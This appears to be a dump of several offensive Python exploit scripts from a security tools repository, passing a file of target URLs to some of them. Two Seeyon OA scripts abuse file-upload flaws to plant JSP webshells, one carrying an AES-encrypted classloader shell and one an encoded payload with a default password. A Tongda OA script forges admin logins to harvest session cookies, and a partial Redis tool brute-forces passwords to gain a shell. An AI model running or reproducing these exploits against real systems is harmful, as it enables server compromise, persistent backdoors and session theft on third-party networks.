print('+ \033[34mVersion: 致远OA Session泄露 任意文件上传漏洞 \033[0m') 16 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 17 | print('+ \033[36m文件名: url.txt \033[0m') 18 | print('+---------------------------------------------------') 19 | 20 | #随机ua 21 | def get_ua(): 22 | first_num = random.randint(55, 62) 23 | third_num = random.randint(0, 3200) 24 | fourth_num = random.randint(0, 140) 25 | os_type = [ 26 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 27 | '(Macintosh; Intel Mac OS X 10_12_6)' 28 | ] 29 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 30 | 31 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 32 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 33 | ) 34 | return ua 35 | 36 | def check_file(): 37 | path = os.getcwd() 38 | file_path = os.path.join(path,"payload.zip") 39 | if os.path.exists(file_path): 40 | os.remove(file_path) 41 | 42 | 43 | def write_zipfile(fname, content): 44 | with zipfile.ZipFile( 45 | 'payload.zip', 46 | mode='a', 47 | compression=zipfile.ZIP_DEFLATED, 48 | ) as zf: 49 | zf.writestr('layout.xml', "") 50 | 
zf.writestr(fname, content) 51 | 52 | 53 | 54 | def rand_str(num): 55 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num)) 56 | return ran_str 57 | 58 | def get_cookie(targeturl): 59 | headers = {'User-Agent': get_ua(),'Content-Type': 'application/x-www-form-urlencoded'} 60 | url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl) 61 | post="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8") 62 | try: 63 | response = requests.post(url=url,data=post,headers=headers, timeout=60,verify=False) 64 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 65 | cookies = response.cookies 66 | cookies = requests.utils.dict_from_cookiejar(cookies) 67 | jsessionid = cookies['JSESSIONID'] 68 | return jsessionid 69 | else: 70 | exit() 71 | except: 72 | pass 73 | 74 | 75 | def upload_zip(targeturl,cookie): 76 | url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl) 77 | files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octet-stream'))] 78 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua()} 79 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 80 | 'isEncrypt': "0"} 81 | try: 82 | response = requests.post(url=url,files=files,data=post, headers=headers,timeout=60,verify=False) 83 | if response and response.status_code == 200 and 'fileurls=' in response.text: 84 | fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) 85 | if len(fileid) > 0: 86 | return fileid[0] 87 | else: 88 | exit() 89 | except: 90 | pass 91 | 92 | def extract_file(targeturl,cookie,fileid): 93 | url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl) 94 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua(), 
'Content-Type':'application/x-www-form-urlencoded'} 95 | datestr = time.strftime('%Y-%m-%d') 96 | post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D' 97 | try: 98 | response = requests.post(url, data=post,headers=headers,timeout=60,verify=False) 99 | if response.status_code == 500 and "Error" in response.text: 100 | #print("[+] extract file is ok!") 101 | return True 102 | else: 103 | #print("[-] extract file error !") 104 | exit() 105 | except: 106 | pass 107 | 108 | 109 | 110 | 111 | 112 | def main(targeturl): 113 | fname = f'../{rand_str(8)}.jsp' 114 | shell = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="5823cd3093f16f3b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 115 | check_file() 116 | write_zipfile(fname,shell) 117 | cookie = get_cookie(targeturl) 118 | fileid = upload_zip(targeturl, cookie) 119 | if extract_file(targeturl, cookie, fileid): 120 | url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1]) 121 | with open('webshell.txt', 'a', encoding='utf8') as web: 122 | web.write("webshell 地址: {url}\n".format(url=url)) 123 | print("\033[32m[+]目标 {} 被上传木马: {}\033[0m".format(targeturl, url)) 124 | 125 | # 获取每行url 126 | def get_urls_head(targeturl): 127 | line = 'http://'+targeturl 128 | lines ='https://'+targeturl 129 | try: 130 | response=requests.get(url=line,timeout=10,verify=False) 131 | if (response.status_code == 200): 132 | return line 133 | response = requests.get(url=lines, timeout=10, 
verify=False) 134 | if (response.status_code == 200): 135 | return lines 136 | except: 137 | pass 138 | 139 | if __name__ == '__main__': 140 | title() 141 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 142 | for line in open(file_name): 143 | line = line.strip('\n') 144 | targeturl = get_urls_head(line) 145 | if (targeturl != None): 146 | main(targeturl) 147 | 148 | -------------------------------------------------------------------------------- /seeyon/seeyon_ajax_exp/seeyon_upload_exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | from time import time 4 | import random 5 | import urllib3 6 | from urllib import parse 7 | from argparse import ArgumentParser 8 | import threadpool 9 | 10 | 11 | #python3 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | filename = sys.argv[1] 14 | url_list=[] 15 | 16 | 17 | #随机ua 18 | def get_ua(): 19 | first_num = random.randint(55, 62) 20 | third_num = random.randint(0, 3200) 21 | fourth_num = random.randint(0, 140) 22 | os_type = [ 23 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 24 | '(Macintosh; Intel Mac OS X 10_12_6)' 25 | ] 26 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 27 | 28 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 29 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 30 | ) 31 | return ua 32 | 33 | #poc扫描函数 减少误报 34 | def scan(url): 35 | url=parse.urlparse(url) 36 | url=url.scheme + '://' + url.netloc 37 | headers = {'User-Agent': get_ua()} 38 | rurl1 = str(url)+"/seeyon/autoinstall.do.css/..;/ajax.do" 39 | try: 40 | resp = requests.get(url = rurl1, headers = headers, verify = False, timeout=10) 41 | if "java.lang.NullPointerException:nul" in resp.text: 42 | print("[+]" + url + "存在文件上传漏洞!") 43 | post_shell(url) 44 | else: 45 | print("[-]" + url + "不存在文件上传漏洞。") 46 | except Exception as e: 47 | print("[!]很遗憾!目标不存在漏洞 {} 
\033[0m".format(e)) 48 | sys.exit(0) 49 | 50 | #getshell函数 51 | def post_shell(url): 52 | headers = {'User-Agent': get_ua()} 53 | rurl2 = str(url) + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip" 54 | data = "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6
%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00" 55 | try: 56 | requests.post(url = rurl2, headers = headers, data = data, verify = False, timeout=5) 57 | get_shell(url) 58 | except: 59 | print("请求异常!已跳过。") 60 | 61 | #访问webshell成功并返回webshell地址 62 | def 
get_shell(url): 63 | headers = {'User-Agent': get_ua()} 64 | webshell = str(url)+ "/seeyon/SeeyonUpdate1.jspx" 65 | try: 66 | response = requests.get(url=webshell, timeout=10, verify=False, headers=headers) 67 | if response.status_code == 200: 68 | print("\033[32m[+] 目标 {} 成功上传 \033[0m".format(url)) 69 | print("\033[32m[+] webshell地址:{}/seeyon/SeeyonUpdate1.jspx \033[0m".format(url)) 70 | print("\033[32m[+] 冰蝎3默认马 pass :rebeyond \033[0m".format(url)) 71 | else: 72 | print("\033[31m[-] webshell写入失败 \033[0m") 73 | 74 | 75 | except Exception as e: 76 | print("\033[31m[-] 目标漏洞无法利用,写入失败 {} \033[0m".format(e)) 77 | sys.exit(0) 78 | 79 | 80 | #多线程 81 | def multithreading(url_list, pools=5): 82 | works = [] 83 | for i in url_list: 84 | works.append(i) 85 | pool = threadpool.ThreadPool(pools) 86 | reqs = threadpool.makeRequests(scan, works) 87 | [pool.putRequest(req) for req in reqs] 88 | pool.wait() 89 | 90 | 91 | if __name__ == "__main__": 92 | show = r''' 93 | 94 | _____ 95 | / ___| 96 | \ `--. ___ ___ _ _ ___ _ __ _____ ___ __ 97 | `--. 
\/ _ \/ _ \ | | |/ _ \| '_ \ / _ \ \/ / '_ \ 98 | /\__/ / __/ __/ |_| | (_) | | | | | __/> <| |_) | 99 | \____/ \___|\___|\__, |\___/|_| |_| \___/_/\_\ .__/ 100 | __/ | ______ | | 101 | |___/ |______| |_| 102 | 103 | fileupload_exp by m2 104 | ''' 105 | print(show + '\n') 106 | arg=ArgumentParser(description='seeyon_fileupload_exp By m2') 107 | arg.add_argument("-u", 108 | "--url", 109 | help="Target URL; Example:http://ip:port") 110 | arg.add_argument("-f", 111 | "--file", 112 | help="Target URL; Example:url.txt") 113 | args=arg.parse_args() 114 | url=args.url 115 | filename=args.file 116 | start=time() 117 | if url != None and filename == None: 118 | scan(url) 119 | elif url == None and filename != None: 120 | for i in open(filename): 121 | i=i.replace('\n','') 122 | url_list.append(i) 123 | multithreading(url_list,10) 124 | end=time() 125 | print('任务完成,用时%d' %(end-start)) 126 | -------------------------------------------------------------------------------- /tongdaOA/前台任意用户登录/通达OA前台任意用户登录漏洞.py: -------------------------------------------------------------------------------- 1 | ''' 2 | @Author : Sp4ce 3 | @Date : 2020-03-17 23:42:16 4 | LastEditors : Sp4ce 5 | LastEditTime : 2020-08-27 10:21:44 6 | @Description : Challenge Everything. 
7 | ''' 8 | import requests 9 | from random import choice 10 | import argparse 11 | import json 12 | 13 | USER_AGENTS = [ 14 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 15 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 16 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 17 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 18 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 19 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 20 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 21 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 22 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 23 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 24 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 25 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 26 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 27 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 28 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 29 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) 
Presto/2.9.168 Version/11.52", 30 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11", 31 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)", 33 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)", 34 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER", 35 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", 36 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)", 37 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", 38 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)", 39 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", 40 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", 41 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", 42 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", 43 | "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 
Safari/6533.18.5", 44 | "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", 45 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0", 46 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", 47 | "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" 48 | ] 49 | 50 | headers={} 51 | 52 | def getV11Session(url): 53 | checkUrl = url+'/general/login_code.php' 54 | try: 55 | headers["User-Agent"] = choice(USER_AGENTS) 56 | res = requests.get(checkUrl,headers=headers) 57 | resText = str(res.text).split('{') 58 | codeUid = resText[-1].replace('}"}', '').replace('\r\n', '') 59 | getSessUrl = url+'/logincheck_code.php' 60 | res = requests.post( 61 | getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers) 62 | tmp_cookie = res.headers['Set-Cookie'] 63 | headers["User-Agent"] = choice(USER_AGENTS) 64 | headers["Cookie"] = tmp_cookie 65 | check_available = requests.get(url + '/general/index.php',headers=headers) 66 | if '用户未登录' not in check_available.text: 67 | if '重新登录' not in check_available.text: 68 | print('[+]Get Available COOKIE:' + tmp_cookie) 69 | else: 70 | print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') 71 | except: 72 | print('[-]Something Wrong With '+url) 73 | 74 | 75 | 76 | def get2017Session(url): 77 | checkUrl = url+'/ispirit/login_code.php' 78 | try: 79 | headers["User-Agent"] = choice(USER_AGENTS) 80 | res = requests.get(checkUrl,headers=headers) 81 | resText = json.loads(res.text) 82 | codeUid = resText['codeuid'] 83 | codeScanUrl = url+'/general/login_code_scan.php' 84 | res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int( 85 | 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers) 86 | resText = json.loads(res.text) 87 | status = resText['status'] 88 | if status == str(1): 89 | getCodeUidUrl = 
url+'/ispirit/login_code_check.php?codeuid='+codeUid 90 | res = requests.get(getCodeUidUrl) 91 | tmp_cookie = res.headers['Set-Cookie'] 92 | headers["User-Agent"] = choice(USER_AGENTS) 93 | headers["Cookie"] = tmp_cookie 94 | check_available = requests.get(url + '/general/index.php',headers=headers) 95 | if '用户未登录' not in check_available.text: 96 | if '重新登录' not in check_available.text: 97 | print('[+]Get Available COOKIE:' + tmp_cookie) 98 | else: 99 | print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') 100 | else: 101 | print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?') 102 | except: 103 | print('[-]Something Wrong With '+url) 104 | 105 | 106 | if __name__ == "__main__": 107 | parser = argparse.ArgumentParser() 108 | parser.add_argument( 109 | "-v", 110 | "--tdoaversion", 111 | type=int, 112 | choices=[11, 2017], 113 | help="Target TongDa OA Version. e.g: -v 11、-v 2017") 114 | parser.add_argument( 115 | "-url", 116 | "--targeturl", 117 | type=str, 118 | help="Target URL. 
e.g: -url 192.168.2.1、-url http://192.168.2.1" 119 | ) 120 | args = parser.parse_args() 121 | url = args.targeturl 122 | if 'http://' not in url: 123 | url = 'http://' + url 124 | if args.tdoaversion == 11: 125 | getV11Session(url) 126 | elif args.tdoaversion == 2017: 127 | get2017Session(url) 128 | else: 129 | parser.print_help() 130 | -------------------------------------------------------------------------------- /Redis-Getshell/Redis-Getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: UTF-8 -*- 3 | import os 4 | import sys 5 | import socket 6 | from argparse import ArgumentParser 7 | 8 | def Banner(): 9 | banner = """ 10 | ____ ____ ___ _ ____ ____ _ _ ____ _ _ 11 | |__/ |___ | \ | [__ [__ |__| |___ | | 12 | | \ |___ |__/ | ___] ___] | | |___ |___ |___ 13 | Python3 By Forever404 14 | Usage:python3 RedisShell.py -H 192.168.10.128 -P 6379 15 | Usage:python3 RedisShell.py -H 192.168.10.128 -P 6379 -p 123456 16 | """ 17 | print(banner) 18 | 19 | class Check(): 20 | def __init__(self): 21 | self.BUFSIZ = 65535 22 | self.PASSWORD = '' 23 | self.TIMEOUT = 10 24 | self.PORT = 6379 25 | self.HOST = '' 26 | self.parsing() 27 | 28 | def parsing(self): 29 | descript_string = 'The function of this script is to determine whether there is unauthorized access to redis and Brute force redis password' 30 | parse = ArgumentParser(description=descript_string) 31 | parse.add_argument("-H", help="please enter a target") # 可以添加检测IP地址是否合法 32 | parse.add_argument('-P', help="Please enter the port, otherwise the default is 6379") # 没有参数值则默认为6379 33 | parse.add_argument('-a', help="please enter the password,") 34 | args = parse.parse_args() 35 | 36 | if args.H: 37 | self.HOST = args.H 38 | else: 39 | sys.exit("H parameter cannot be empty") 40 | if args.P: 41 | self.PORT = int(args.P) 42 | if args.a: 43 | self.PASSWORD = args.a 44 | 45 | self.Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 46 
| self.Socket.connect((self.HOST, int(self.PORT))) 47 | 48 | def check(self): 49 | if self.PASSWORD: 50 | self.Socket.send(bytes("AUTH {}\n".format(self.PASSWORD),encoding="UTF-8")) 51 | receive = self.Socket.recv(self.BUFSIZ) 52 | if 'OK' in bytes.decode(receive): 53 | return self.Socket 54 | else: 55 | sys.exit("wrong password") 56 | self.Socket.send(b'info\n') 57 | receive = self.Socket.recv(self.BUFSIZ) 58 | if 'redis_version' in bytes.decode(receive): 59 | print("it is exist vulnerable") 60 | return self.Socket 61 | elif 'NOAUTH Authentication required' in bytes.decode(receive): 62 | print("AUTH Authentication required") 63 | while True: 64 | key = input("Please choose whether you need brute force cracking?yes or no:") 65 | if key == 'yes' or key == 'y' or key == 'Y': 66 | password_path = input("please input a ture password path:") 67 | Brute = BruteForce(host=self.HOST, port=self.PORT, passwd_path=password_path,Socket=self.Socket,BUFSIZ=self.BUFSIZ) 68 | Brute.main() 69 | return self.Socket 70 | elif key =='no' or key =='NO' or key=="n" or key=="N": 71 | self.Socket.close() 72 | sys.exit() 73 | else: 74 | print("I Don't know what you do,please try again!") 75 | else: 76 | print("I don't know whether to enable redis!") 77 | 78 | class BruteForce(): 79 | def __init__(self,host,port,passwd_path,Socket,BUFSIZ): 80 | self.passwd_path = passwd_path 81 | self.thread_number = 20 82 | self.Socket = Socket 83 | self.BUFSIZ = BUFSIZ 84 | self.host = host 85 | self.port = port 86 | 87 | def check(self): 88 | if os.path.exists(self.passwd_path): 89 | if os.path.isfile(self.passwd_path): 90 | return True 91 | else: 92 | sys.exit("{} not a file".format(self.passwd_path)) 93 | else: 94 | sys.exit("{} not found".format(self.passwd_path)) 95 | 96 | def concet(self,password): 97 | self.Socket.send(bytes("AUTH {}\n".format(password.decode('UTF-8')), encoding="UTF-8")) 98 | res = self.Socket.recv(self.BUFSIZ) 99 | 100 | if 'OK' in bytes.decode(res): 101 | 
print('[+]:password---{}'.format(password.decode("UTF-8"))) 102 | return True 103 | else: 104 | print("[-]:{}".format(password.decode("UTF-8"))) 105 | 106 | def main(self): 107 | if self.check(): 108 | with open(self.passwd_path) as file: 109 | for line in file.readlines(): 110 | if "'" not in line and '"' not in line: 111 | line = line.rstrip('\n').encode("UTF-8") 112 | if self.concet(line): 113 | break 114 | 115 | class Shell(): 116 | def __init__(self): 117 | self.save = 'save' 118 | self.BUFSIZ = 65535 119 | start = Check() 120 | self.Socket = start.check() 121 | print("1:Webshell\n"+"2:ssh\n"+"3:bash\n") 122 | 123 | number = input("please choose which shell or exit:") 124 | 125 | if number=='exit': 126 | sys.exit("Good bye!!") 127 | elif number=='1': 128 | self.Webshell() 129 | elif number=='2': 130 | self.ssh() 131 | elif number=='3': 